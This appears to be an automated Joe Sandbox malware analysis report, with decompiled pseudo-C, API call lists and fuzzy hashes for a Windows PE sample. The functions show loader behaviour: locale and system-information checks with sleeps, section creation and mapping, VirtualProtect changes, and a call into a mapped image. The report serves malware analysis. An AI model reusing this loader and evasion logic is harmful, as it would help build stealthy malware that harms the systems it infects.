                                  0x00000000
                                  0x00000000
                                  0x00401446
                                  0x00401451
                                  0x00000000
                                  0x00401451
                                  0x00401448
                                  0x00401448
                                  0x0040144e
                                  0x00000000
                                  0x0040144e
                                  0x0040137c
                                  0x00401452
                                  0x00401457

                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401387
                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004013F9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID:
                                  • API String ID: 2574300362-0
                                  • Opcode ID: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
                                  • Instruction ID: a8434760b72dced533d6b1e45b9ae802b84f7c41c3403426f2e3ea1f70bc4997
                                  • Opcode Fuzzy Hash: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
                                  • Instruction Fuzzy Hash: A0310775A0121ADBDB14CF59C994AAEB7F4FF04310F24407AD902EB3A0E778EA41DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 153 401f78-401faa NtMapViewOfSection 154 401fb0 153->154 155 401fac-401fae 153->155 156 401fb4-401fb7 154->156 155->156
                                  C-Code - Quality: 68%
                                  			E00401F78(void** __esi, PVOID* _a4) {
                                  				long _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				long _t13;
                                  
                                  				_v16 = 0;
                                  				asm("stosd");
                                  				_v8 = 0;
                                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                  				if(_t13 < 0) {
                                  					_push(_t13);
                                  					return __esi[6]();
                                  				}
                                  				return 0;
                                  			}







                                  0x00401f8a
                                  0x00401f90
                                  0x00401f9e
                                  0x00401fa5
                                  0x00401faa
                                  0x00401fb0
                                  0x00000000
                                  0x00401fb1
                                  0x00000000

                                  APIs
                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E07,00000002,00000000,?,?,00000000,?,?,00401E07,00000002), ref: 00401FA5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: SectionView
                                  • String ID:
                                  • API String ID: 1323581903-0
                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                  • Instruction ID: c55f902479581699a0c324a5f7b4548b03dce4ae1f92d5d63f21deca0fc447f7
                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                  • Instruction Fuzzy Hash: B3F012B590420DBFDB119FA5CC85C9FBBBDEB44394B104A3AB552E11A0D6309E089A60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			_entry_() {
                                  				void* _t1;
                                  				int _t4;
                                  				int _t6;
                                  
                                  				_t6 = 0;
                                  				_t1 = HeapCreate(0, 0x400000, 0); // executed
                                  				 *0x403160 = _t1;
                                  				if(_t1 != 0) {
                                  					 *0x403170 = GetModuleHandleA(0);
                                  					GetCommandLineW(); // executed
                                  					_t4 = E00401493(); // executed
                                  					_t6 = _t4;
                                  					HeapDestroy( *0x403160);
                                  				}
                                  				ExitProcess(_t6);
                                  			}






                                  0x00401830
                                  0x00401839
                                  0x0040183f
                                  0x00401846
                                  0x0040184f
                                  0x00401854
                                  0x0040185a
                                  0x00401865
                                  0x00401867
                                  0x00401867
                                  0x0040186e

                                  APIs
                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401839
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00401849
                                  • GetCommandLineW.KERNEL32 ref: 00401854
                                    • Part of subcall function 00401493: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004014C8
                                    • Part of subcall function 00401493: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 0040150F
                                    • Part of subcall function 00401493: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401537
                                    • Part of subcall function 00401493: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401541
                                    • Part of subcall function 00401493: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401554
                                    • Part of subcall function 00401493: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401581
                                    • Part of subcall function 00401493: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040159F
                                  • HeapDestroy.KERNEL32 ref: 00401867
                                  • ExitProcess.KERNEL32 ref: 0040186E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                                  • String ID: Tqt
                                  • API String ID: 1863574965-564558472
                                  • Opcode ID: 97b04516d4304a837a7655c5891b85a5ac373015af52e8364f4eed2c235b444e
                                  • Instruction ID: c66274986b3ea6f1620f212ac01f8038ee2d29bdd939a4d2e60d119bbebbbe51
                                  • Opcode Fuzzy Hash: 97b04516d4304a837a7655c5891b85a5ac373015af52e8364f4eed2c235b444e
                                  • Instruction Fuzzy Hash: B7E0B671402720ABC3112FB1AF0CA4F3E28BB0A7527048536F605F22B1CB780A01CA9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00401B39(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                  				intOrPtr _v8;
                                  				_Unknown_base(*)()* _t29;
                                  				_Unknown_base(*)()* _t33;
                                  				_Unknown_base(*)()* _t36;
                                  				_Unknown_base(*)()* _t39;
                                  				_Unknown_base(*)()* _t42;
                                  				intOrPtr _t46;
                                  				struct HINSTANCE__* _t50;
                                  				intOrPtr _t56;
                                  
                                  				_t56 = E0040181A(0x20);
                                  				if(_t56 == 0) {
                                  					_v8 = 8;
                                  				} else {
                                  					_t50 = GetModuleHandleA( *0x403184 + 0x404014);
                                  					_v8 = 0x7f;
                                  					_t29 = GetProcAddress(_t50,  *0x403184 + 0x404151);
                                  					 *(_t56 + 0xc) = _t29;
                                  					if(_t29 == 0) {
                                  						L8:
                                  						E0040147E(_t56);
                                  					} else {
                                  						_t33 = GetProcAddress(_t50,  *0x403184 + 0x404161);
                                  						 *(_t56 + 0x10) = _t33;
                                  						if(_t33 == 0) {
                                  							goto L8;
                                  						} else {
                                  							_t36 = GetProcAddress(_t50,  *0x403184 + 0x404174);
                                  							 *(_t56 + 0x14) = _t36;
                                  							if(_t36 == 0) {
                                  								goto L8;
                                  							} else {
                                  								_t39 = GetProcAddress(_t50,  *0x403184 + 0x404189);
                                  								 *(_t56 + 0x18) = _t39;
                                  								if(_t39 == 0) {
                                  									goto L8;
                                  								} else {
                                  									_t42 = GetProcAddress(_t50,  *0x403184 + 0x40419f);
                                  									 *(_t56 + 0x1c) = _t42;
                                  									if(_t42 == 0) {
                                  										goto L8;
                                  									} else {
                                  										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                  										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                  										_t46 = E00401D95(_t56, _a12); // executed
                                  										_v8 = _t46;
                                  										if(_t46 != 0) {
                                  											goto L8;
                                  										} else {
                                  											 *_a16 = _t56;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _v8;
                                  			}












                                  0x00401b47
                                  0x00401b4b
                                  0x00401c0c
                                  0x00401b51
                                  0x00401b69
                                  0x00401b78
                                  0x00401b7f
                                  0x00401b81
                                  0x00401b86
                                  0x00401c04
                                  0x00401c05
                                  0x00401b88
                                  0x00401b95
                                  0x00401b97
                                  0x00401b9c
                                  0x00000000
                                  0x00401b9e
                                  0x00401bab
                                  0x00401bad
                                  0x00401bb2
                                  0x00000000
                                  0x00401bb4
                                  0x00401bc1
                                  0x00401bc3
                                  0x00401bc8
                                  0x00000000
                                  0x00401bca
                                  0x00401bd7
                                  0x00401bd9
                                  0x00401bde
                                  0x00000000
                                  0x00401be0
                                  0x00401be6
                                  0x00401bec
                                  0x00401bf1
                                  0x00401bf6
                                  0x00401bfb
                                  0x00000000
                                  0x00401bfd
                                  0x00401c00
                                  0x00401c00
                                  0x00401bfb
                                  0x00401bde
                                  0x00401bc8
                                  0x00401bb2
                                  0x00401b9c
                                  0x00401b86
                                  0x00401c1a

                                  APIs
                                    • Part of subcall function 0040181A: RtlAllocateHeap.NTDLL(00000000,?,004014BA,00000030,?,00000000), ref: 00401826
                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004018B1,?,?,?,?,?,00000002,?,?), ref: 00401B5D
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401B7F
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401B95
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401BAB
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401BC1
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401BD7
                                    • Part of subcall function 00401D95: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401DF2
                                    • Part of subcall function 00401D95: memset.NTDLL ref: 00401E14
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                  • String ID:
                                  • API String ID: 3012371009-0
                                  • Opcode ID: 69b94d7d7b042312cfe0a202c9dcd1738c3531b62b0226c4a5812b8c41c682d3
                                  • Instruction ID: d3c3635dfac63004e6023c36051fb9f2085c9b8f0634433d2a6b82aac8f12b84
                                  • Opcode Fuzzy Hash: 69b94d7d7b042312cfe0a202c9dcd1738c3531b62b0226c4a5812b8c41c682d3
                                  • Instruction Fuzzy Hash: 34212DF160464BAFEB11DF6ADD44D6BB7ECAF44305700447AEA05EB261DB74EA00CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 91 401e3d-401e80 VirtualProtect 92 401f15-401f1c 91->92 93 401e86-401e8a 91->93 93->92 94 401e90-401e9a 93->94 95 401eb8-401ec2 94->95 96 401e9c-401ea6 94->96 99 401ec4-401ed4 95->99 100 401ed6 95->100 97 401eb0-401eb6 96->97 98 401ea8-401eae 96->98 101 401edc-401eef VirtualProtect 97->101 98->101 99->100 99->101 100->101 102 401ef1-401ef7 GetLastError 101->102 103 401efa-401f0f 101->103 102->103 103->92 103->93
                                  C-Code - Quality: 87%
                                  			E00401E3D(void* __eax, void* _a4) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				long _v20;
                                  				int _t43;
                                  				long _t54;
                                  				signed int _t57;
                                  				void* _t58;
                                  				signed int _t60;
                                  
                                  				_v12 = _v12 & 0x00000000;
                                  				_t57 =  *0x403180;
                                  				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                  				_v16 =  *(__eax + 6) & 0x0000ffff;
                                  				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                  				_v8 = _v8 & 0x00000000;
                                  				if(_v16 <= 0) {
                                  					L12:
                                  					return _v12;
                                  				} else {
                                  					goto L1;
                                  				}
                                  				while(1) {
                                  					L1:
                                  					_t60 = _v12;
                                  					if(_t60 != 0) {
                                  						goto L12;
                                  					}
                                  					asm("bt [esi+0x24], eax");
                                  					if(_t60 >= 0) {
                                  						asm("bt [esi+0x24], eax");
                                  						if(__eflags >= 0) {
                                  							L8:
                                  							_t54 = _t57 - 0x69b25f40;
                                  							L9:
                                  							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                  							if(_t43 == 0) {
                                  								_v12 = GetLastError();
                                  							}
                                  							_v8 = _v8 + 1;
                                  							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                  							if(_v8 < _v16) {
                                  								continue;
                                  							} else {
                                  								goto L12;
                                  							}
                                  						}
                                  						asm("bt [esi+0x24], eax");
                                  						_t54 = _t57 - 0x69b25f42;
                                  						if(__eflags >= 0) {
                                  							goto L9;
                                  						}
                                  						goto L8;
                                  					}
                                  					asm("bt [esi+0x24], eax");
                                  					if(_t60 >= 0) {
                                  						_t54 = _t57 - 0x69b25f24;
                                  					} else {
                                  						_t54 = _t57 - 0x69b25f04;
                                  					}
                                  					goto L9;
                                  				}
                                  				goto L12;
                                  			}












                                  0x00401e47
                                  0x00401e54
                                  0x00401e5a
                                  0x00401e66
                                  0x00401e76
                                  0x00401e78
                                  0x00401e80
                                  0x00401f15
                                  0x00401f1c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401e86
                                  0x00401e86
                                  0x00401e86
                                  0x00401e8a
                                  0x00000000
                                  0x00000000
                                  0x00401e96
                                  0x00401e9a
                                  0x00401ebe
                                  0x00401ec2
                                  0x00401ed6
                                  0x00401ed6
                                  0x00401edc
                                  0x00401eeb
                                  0x00401eef
                                  0x00401ef7
                                  0x00401ef7
                                  0x00401eff
                                  0x00401f02
                                  0x00401f0f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401f0f
                                  0x00401eca
                                  0x00401ece
                                  0x00401ed4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401ed4
                                  0x00401ea2
                                  0x00401ea6
                                  0x00401eb0
                                  0x00401ea8
                                  0x00401ea8
                                  0x00401ea8
                                  0x00000000
                                  0x00401ea6
                                  0x00000000

                                  APIs
                                  • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401E76
                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401EEB
                                  • GetLastError.KERNEL32 ref: 00401EF1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual$ErrorLast
                                  • String ID:
                                  • API String ID: 1469625949-0
                                  • Opcode ID: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
                                  • Instruction ID: 3241aa71f1d949b352c2025a784480cc2ce18444d2ae61006a318d933437353e
                                  • Opcode Fuzzy Hash: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
                                  • Instruction Fuzzy Hash: 6521607180020ADFCB14CF95C985EBEF7B4FF48345F11446AD506E7164E3B8AA64CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 132 4011f6-40120d 133 401217 132->133 134 40120f-401215 132->134 135 40121d-40124a call 401329 call 401920 133->135 134->135 140 4012a5-4012a9 ExitThread 135->140 141 40124c-401271 lstrlenW call 401a49 135->141 145 401273-401285 141->145 146 40129a-40129e call 401875 141->146 147 401294-401296 145->147 148 401287-401292 call 401fba 145->148 151 4012a3 BasepAppContainerEnvironmentExtension 146->151 147->146 148->146 151->140
                                  C-Code - Quality: 100%
                                  			E004011F6() {
                                  				char _v16;
                                  				intOrPtr _v28;
                                  				void _v32;
                                  				void* _v36;
                                  				intOrPtr _t15;
                                  				void* _t16;
                                  				void* _t24;
                                  				long _t25;
                                  				int _t26;
                                  				void* _t30;
                                  				intOrPtr* _t32;
                                  				signed int _t36;
                                  				intOrPtr _t39;
                                  
                                  				_t15 =  *0x403184;
                                  				if( *0x40316c > 5) {
                                  					_t16 = _t15 + 0x4040f9;
                                  				} else {
                                  					_t16 = _t15 + 0x4040b1;
                                  				}
                                  				E00401329(_t16, _t16);
                                  				_t36 = 6;
                                  				memset( &_v32, 0, _t36 << 2);
                                  				_t24 = E00401920( &_v32,  &_v16,  *0x403180 ^ 0xf7a71548); // executed
                                  				if(_t24 == 0) {
                                  					_t25 = 0xb;
                                  				} else {
                                  					_t26 = lstrlenW( *0x403178);
                                  					_t8 = _t26 + 2; // 0x2
                                  					_t11 = _t26 + _t8 + 8; // 0xa
                                  					_t30 = E00401A49(_t39, _t11,  &_v32,  &_v36); // executed
                                  					if(_t30 == 0) {
                                  						_t40 =  *0x403178;
                                  						_t32 = _v36;
                                  						 *_t32 = 0;
                                  						if( *0x403178 == 0) {
                                  							 *((short*)(_t32 + 4)) = 0;
                                  						} else {
                                  							E00401FBA(_t45, _t40, _t32 + 4);
                                  						}
                                  					}
                                  					_t25 = E00401875(_v28); // executed
                                  				}
                                  				ExitThread(_t25);
                                  			}
















                                  0x004011fc
                                  0x0040120d
                                  0x00401217
                                  0x0040120f
                                  0x0040120f
                                  0x0040120f
                                  0x0040121e
                                  0x00401227
                                  0x0040122c
                                  0x00401243
                                  0x0040124a
                                  0x004012a7
                                  0x0040124c
                                  0x00401252
                                  0x00401258
                                  0x00401266
                                  0x0040126a
                                  0x00401271
                                  0x00401273
                                  0x00401279
                                  0x0040127d
                                  0x00401285
                                  0x00401296
                                  0x00401287
                                  0x0040128d
                                  0x0040128d
                                  0x00401285
                                  0x0040129e
                                  0x0040129e
                                  0x004012a9

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: ExitThreadlstrlen
                                  • String ID:
                                  • API String ID: 2636182767-0
                                  • Opcode ID: 790b61abaedcbdc4a60141dd56dd6f5efea9b863add848607eda0236650ecbbf
                                  • Instruction ID: b06575ce47738e750fa21101d439a179049e3a3f6f5bd6bf59ccf56b07c94354
                                  • Opcode Fuzzy Hash: 790b61abaedcbdc4a60141dd56dd6f5efea9b863add848607eda0236650ecbbf
                                  • Instruction Fuzzy Hash: B211AC71504205ABE701DBA5DD09E9777ECAB48304F05497BB601F71B0EB38E6098B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 37%
                                  			E00401329(void* __eax, intOrPtr _a4) {
                                  
                                  				 *0x403190 =  *0x403190 & 0x00000000;
                                  				_push(0);
                                  				_push(0x40318c);
                                  				_push(1);
                                  				_push(_a4);
                                  				 *0x403188 = 0xc; // executed
                                  				L00401814(); // executed
                                  				return __eax;
                                  			}



                                  0x00401329
                                  0x00401330
                                  0x00401332
                                  0x00401337
                                  0x00401339
                                  0x0040133d
                                  0x00401347
                                  0x0040134c

                                  APIs
                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401223,00000001,0040318C,00000000), ref: 00401347
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: DescriptorSecurity$ConvertString
                                  • String ID:
                                  • API String ID: 3907675253-0
                                  • Opcode ID: 2ed8448a664af8dbfd4061e7b4b6ea82259f6e1c2e9b0ef4b3f051abbd3d4665
                                  • Instruction ID: 0a6ed26458322d25cf41c4398ef33c21c70633b53ff5094838ea71f747521604
                                  • Opcode Fuzzy Hash: 2ed8448a664af8dbfd4061e7b4b6ea82259f6e1c2e9b0ef4b3f051abbd3d4665
                                  • Instruction Fuzzy Hash: 6FC04C75150300B6E610AF009D46F457E597758B0AF60452EB644391E1C3F95254952D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 159 40181a-40182c RtlAllocateHeap
                                  C-Code - Quality: 100%
                                  			E0040181A(long _a4) {
                                  				void* _t2;
                                  
                                  				_t2 = RtlAllocateHeap( *0x403160, 0, _a4); // executed
                                  				return _t2;
                                  			}




                                  0x00401826
                                  0x0040182c

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,004014BA,00000030,?,00000000), ref: 00401826
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ffc2bee7e96f03ba20f6f25c32e4a96c4cf6c99a047c73a93cb7f1116150704d
                                  • Instruction ID: 3092cf90e7a1d4585fff80d284c7a06f71a0cf960e90f0812a630bad4f7f329e
                                  • Opcode Fuzzy Hash: ffc2bee7e96f03ba20f6f25c32e4a96c4cf6c99a047c73a93cb7f1116150704d
                                  • Instruction Fuzzy Hash: 82B01271104200ABCA114F50DF08F067E21B798701F004030B304340B082710820FB1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 158 40147e-401490 RtlFreeHeap
                                  C-Code - Quality: 100%
                                  			E0040147E(void* _a4) {
                                  				char _t2;
                                  
                                  				_t2 = RtlFreeHeap( *0x403160, 0, _a4); // executed
                                  				return _t2;
                                  			}




                                  0x0040148a
                                  0x00401490

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000030,004017B0,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401508), ref: 0040148A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c2a9b64b8d0978bf82175768f91838575790ce16ddbfb376c354ea20483dfce9
                                  • Instruction ID: 19babb2e5ad36de5e86cb2f69479443a556bd5f033cd34182d883786aa01e702
                                  • Opcode Fuzzy Hash: c2a9b64b8d0978bf82175768f91838575790ce16ddbfb376c354ea20483dfce9
                                  • Instruction Fuzzy Hash: EBB01231004200ABDA114F50DF08F067F21B798701F008030B304740B082710920FB0C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 160 401875-4018b3 call 401b39 163 4018b5-4018c3 call 401c1d 160->163 164 40190f-401911 160->164 168 4018c5-4018d4 call 40134f 163->168 169 4018fb-40190d call 40147e 163->169 166 401912-401918 164->166 168->169 173 4018d6-4018d9 call 401e3d 168->173 169->166 177 4018de-4018e2 173->177 177->169 179 4018e4-4018f1 177->179 179->169 181 4018f3-4018f9 GetLastError 179->181 181->169
                                  C-Code - Quality: 86%
                                  			E00401875(void* __eax) {
                                  				char _v8;
                                  				void* _v12;
                                  				void* __edi;
                                  				void* _t18;
                                  				long _t24;
                                  				long _t26;
                                  				long _t29;
                                  				intOrPtr _t40;
                                  				void* _t41;
                                  				void* _t42;
                                  				void* _t44;
                                  
                                  				_t41 = __eax;
                                  				_t16 =  *0x403180;
                                  				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45);
                                  				_t18 = E00401B39( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                  				if(_t18 != 0) {
                                  					_t29 = 8;
                                  					goto L8;
                                  				} else {
                                  					_t40 = _v8;
                                  					_t29 = E00401C1D(_t33, _t40, _t41);
                                  					if(_t29 == 0) {
                                  						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                  						_t24 = E0040134F(_t40, _t44); // executed
                                  						_t29 = _t24;
                                  						if(_t29 == 0) {
                                  							_t26 = E00401E3D(_t44, _t40); // executed
                                  							_t29 = _t26;
                                  							if(_t29 == 0) {
                                  								_push(_t26);
                                  								_push(1);
                                  								_push(_t40);
                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                  									_t29 = GetLastError();
                                  								}
                                  							}
                                  						}
                                  					}
                                  					_t42 = _v12;
                                  					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                  					E0040147E(_t42);
                                  					L8:
                                  					return _t29;
                                  				}
                                  			}














                                  0x0040187d
